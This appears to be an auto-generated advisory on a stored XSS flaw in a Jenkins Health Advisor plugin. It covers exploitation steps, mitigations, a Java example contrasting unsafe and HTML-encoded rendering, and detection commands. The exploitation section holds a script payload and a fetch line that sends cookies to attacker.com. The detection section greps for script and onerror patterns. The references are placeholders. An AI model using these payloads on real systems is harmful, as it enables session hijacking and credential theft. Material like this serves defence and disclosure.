How the CVE Works:
The Jenkins Health Advisor by CloudBees Plugin (versions ≤ 374.v194b_d4f0c8c8) renders responses from the Health Advisor server without HTML-escaping them, which allows stored XSS. An attacker who controls the Health Advisor server can inject JavaScript into those responses. When an administrator views them in Jenkins, the script executes in the administrator's browser, enabling session hijacking, credential theft, or privilege escalation to admin. The vulnerability stems from improper output encoding in the plugin's UI rendering logic.
DailyCVE Form:
Platform: Jenkins CloudBees Plugin
Version: ≤ 374.v194b_d4f0c8c8
Vulnerability: Stored XSS
Severity: High
Date: May 16, 2025
What Undercode Says:
Exploitation:
1. Payload Injection:
<script>alert(document.cookie)</script>
Embedded in Health Advisor server responses.
2. Trigger XSS:
Admin views Health Advisor dashboard → payload executes.
3. Exfiltrate Data:
fetch('https://attacker.com/steal?data='+btoa(document.cookie));
Mitigation:
1. Update Plugin:
jenkins-plugin-cli --plugins cloudbees-jenkins-advisor
Downloads the latest release of the plugin (its ID on plugins.jenkins.io is `cloudbees-jenkins-advisor`); restart Jenkins afterwards, or install the update through Manage Jenkins → Plugins.
2. Reverse-Proxy CSP (defense in depth only):
add_header Content-Security-Policy "default-src 'self'; script-src 'self'";
A policy that includes 'unsafe-inline' does not block the inline payload above; one that omits it also blocks Jenkins' own inline scripts and breaks the UI. Treat this header as a supplementary control, not a substitute for the plugin update.
3. Manual Patch:
HTML-encode server responses before rendering in `HealthAdvisor.java`:
import org.apache.commons.text.StringEscapeUtils;
String sanitized = StringEscapeUtils.escapeHtml4(serverResponse);
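As an added example, not the plugin's own code, the vulnerable rendering sits beside its hardened form, with a check that the page's payload is inert after encoding. `AdvisorResponseRenderer` and its methods are hypothetical names, and the test vectors are constructed.

```java
import java.util.List;

/** Added example (not the plugin's code): encode untrusted advisor data before rendering. */
public final class AdvisorResponseRenderer {
    private static final String WRAPPER_OPEN = "<div class=\"advisor-result\">";

    /** Vulnerable form, as the advisory describes: raw server response interpolated into HTML. */
    static String renderUnsafe(String serverResponse) {
        return WRAPPER_OPEN + serverResponse + "</div>";
    }

    /** Hardened form: HTML-encode the response so the browser treats it as text, not markup. */
    static String renderSafe(String serverResponse) {
        return WRAPPER_OPEN + escapeHtml(serverResponse) + "</div>";
    }

    /** Minimal encoder covering the characters that matter in element and attribute context;
     *  in a real plugin use StringEscapeUtils.escapeHtml4 (commons-text) or hudson.Util.escape. */
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Rough check used only by this demo: does the interpolated part still contain a script
     *  tag or an unencoded double quote that could break out of an attribute? */
    static boolean looksExecutable(String html) {
        String inner = html.substring(WRAPPER_OPEN.length());
        return inner.toLowerCase().contains("<script") || inner.contains("\"");
    }

    public static void main(String[] args) {
        // Constructed test vectors standing in for attacker-controlled server responses.
        List<String> responses = List.of(
                "<script>alert(document.cookie)</script>",
                "x\" onerror=\"alert(1)");
        for (String r : responses) {
            System.out.println("unsafe: " + renderUnsafe(r) + "  executable=" + looksExecutable(renderUnsafe(r)));
            System.out.println("safe:   " + renderSafe(r) + "  executable=" + looksExecutable(renderSafe(r)));
        }
    }
}
```

For both vectors the unsafe rendering reports executable=true and the encoded rendering executable=false; the same encoding applies when the value is placed inside an attribute, which is why `"` is encoded as well.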
Detection:
1. Scan Jenkins Logs:
grep -r "HealthAdvisor" /var/log/jenkins/ | grep "<script>"
2. Curl Check:
curl -s -u "$JENKINS_USER:$JENKINS_API_TOKEN" "http://jenkins/health-advisor/api/results" | grep -E "<script|onerror="
The rendered dashboard contains Jenkins' own `<script>` tags, so grep the advisor's result data (the affected endpoint listed below) rather than the HTML page, and compare against a known-clean baseline.
Impact Analysis:
- CVSS: 8.2 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Affected Endpoints: `/health-advisor/api/results`
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- NVD: CVE-2025-XXXX
Sources:
Reported By: github.com